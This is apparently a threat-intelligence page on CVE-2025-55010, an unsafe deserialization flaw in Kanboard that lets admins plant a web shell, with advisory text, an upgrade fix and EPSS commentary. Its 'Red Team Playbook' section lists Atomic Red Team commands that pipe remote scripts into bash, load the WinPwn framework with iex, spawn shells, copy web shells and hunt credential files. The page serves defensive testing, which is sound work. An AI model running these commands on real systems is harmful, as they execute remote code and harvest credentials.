CVE-2025-55010
Overview
This vulnerability is an unsafe deserialization flaw in the ProjectEventActivityFormatter component of Kanboard. It arises from improper handling of serialized PHP objects within the event["data"] field stored in the project_activities database table. The flaw allows authenticated admin users to manipulate this field to instantiate arbitrary PHP objects, exploiting PHP object injection mechanisms.
Vulnerability Description
Kanboard is project management software that focuses on the Kanban methodology. Prior to version 1.2.47, an unsafe deserialization vulnerability in the ProjectEventActvityFormatter allows admin users the ability to instantiate arbitrary php objects by modifying the event["data"] field in the project_activities table. A malicious actor can update this field to use a php gadget to write a web shell into the /plugins folder, which then gives remote code execution on the host system. This issue has been patched in version 1.2.47.
Impact
An attacker with administrative privileges can exploit this vulnerability to execute arbitrary PHP code on the host system by injecting a web shell into the /plugins folder. This enables full remote code execution (RCE) with high privileges (PR:H) over a network (AV:N) without user interaction (UI:N), potentially compromising confidentiality, integrity, and availability of the system (C:H/I:H/A:H). The attacker must have authenticated admin access to the Kanboard instance to leverage this flaw.
Solution
Upgrade Kanboard to version 1.2.47 or later, where this unsafe deserialization vulnerability has been patched as per the GitHub security advisory GHSA-359x-c69j-q64r. The fix involves sanitizing and validating the event["data"] field in the ProjectActivityEventFormatter component to prevent arbitrary object instantiation. Refer to the official advisory and commit 7148ac092e5db6b33e0fc35e04bca328d96c1f6f for detailed patch implementation and update instructions.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Kanboard arises from an unsafe deserialization flaw within the ProjectEventActivityFormatter component. This vulnerability permits administrative users to manipulate the event["data"] field in the project_activities table, allowing the instantiation of arbitrary PHP objects. Such manipulation is particularly dangerous because it can lead to the execution of malicious code on the server. When an attacker successfully modifies this field, they can leverage PHP gadgets—pre-existing classes or functions within the application—to write a web shell into the /plugins directory. This web shell can then be executed remotely, granting the attacker full control over the host system.
Exploitation of this vulnerability can occur through various attack vectors. An attacker with administrative access could directly modify the event["data"] field through the application’s interface. Alternatively, if an attacker can gain administrative credentials through social engineering or other means, they could exploit this flaw to deploy malicious payloads. Once the web shell is in place, the attacker can execute arbitrary commands, upload additional malware, or exfiltrate sensitive data. The ease with which an attacker can exploit this vulnerability highlights the critical need for robust access controls and monitoring within administrative interfaces.
The real-world impact of this vulnerability can be severe, particularly for organizations that rely on Kanboard for project management. Successful exploitation could lead to unauthorized access to sensitive project data, disruption of services, or even complete system compromise. The business risks associated with such an incident include potential data breaches, loss of customer trust, regulatory penalties, and significant remediation costs. Organizations may also face reputational damage, which can have long-lasting effects on their market position and customer relationships. The ability for an attacker to execute remote code could also facilitate further attacks within the organization's network, leading to a broader compromise.
To detect and mitigate this vulnerability, organizations should prioritize upgrading to the patched version of Kanboard, specifically version 1.2.47 or later. Regularly updating software is a fundamental practice in cybersecurity, as it helps to close known vulnerabilities. Additionally, implementing strict access controls and monitoring administrative actions can help to prevent unauthorized modifications to critical data fields. Organizations should also employ web application firewalls (WAFs) to detect and block malicious payloads and anomalous behavior. Regular security assessments, including penetration testing and code reviews, can further enhance the security posture by identifying and addressing potential vulnerabilities before they can be exploited.
In conclusion, the unsafe deserialization vulnerability in Kanboard presents a significant risk to organizations utilizing this project management software. The potential for remote code execution through the manipulation of the event["data"] field underscores the importance of secure coding practices and robust access controls. By adopting a proactive approach to vulnerability management, including timely updates and comprehensive monitoring, organizations can mitigate the risks associated with this and similar vulnerabilities, safeguarding their systems and data from malicious actors.
CSURFACE threat intelligence has detected a modest but consistent increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2025-55010, reflecting a growing likelihood of exploitation attempts targeting the Kanboard unsafe deserialization vulnerability. Although no new exploit techniques or proof-of-concept code have surfaced, the upward trend in EPSS—now approaching the 0.044 mark and within the upper decile percentile—indicates heightened attacker interest or preparatory activity. This subtle escalation matters because it suggests that threat actors may be refining their capabilities or expanding reconnaissance efforts, potentially setting the stage for more frequent or sophisticated exploitation attempts. For defenders, this signals the need for increased vigilance in monitoring anomalous behaviors related to project_activities table modifications and web shell deployments within Kanboard environments. While the overall threat level remains high due to the vulnerability’s inherent severity and ease of exploitation by privileged users, the recent EPSS increase marginally elevates the risk posture, underscoring the importance of continuous threat intelligence integration to anticipate shifts in adversary tactics.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Kanboard | Kanboard | All |
cpe:2.3:a:kanboard:kanboard:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-586 | Object Injection |
60%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-55010 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/kanboard/kanboard/security/advisories/GHSA-359x-c69j-q64r |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/kanboard/kanboard/commit/7148ac092e5db6b33e0fc35e04bca328d96c1f6f |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/kanboard/kanboard/blob/b033c0e0f982f8158e240bce8ab54c29727f8efe/app/Formatter/ProjectActivityEventFormatter.php#L43-L57 |